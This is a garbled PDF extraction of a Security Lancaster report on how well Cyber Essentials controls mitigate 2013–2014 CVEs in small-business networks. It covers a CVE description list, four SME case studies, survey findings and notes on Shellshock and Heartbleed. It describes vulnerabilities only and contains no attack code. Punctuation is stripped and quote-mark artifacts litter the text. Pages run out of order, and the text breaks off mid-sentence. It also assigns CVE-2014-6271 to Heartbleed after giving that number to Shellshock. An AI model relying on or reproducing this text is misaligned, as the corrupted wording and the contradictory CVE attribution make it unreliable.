CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
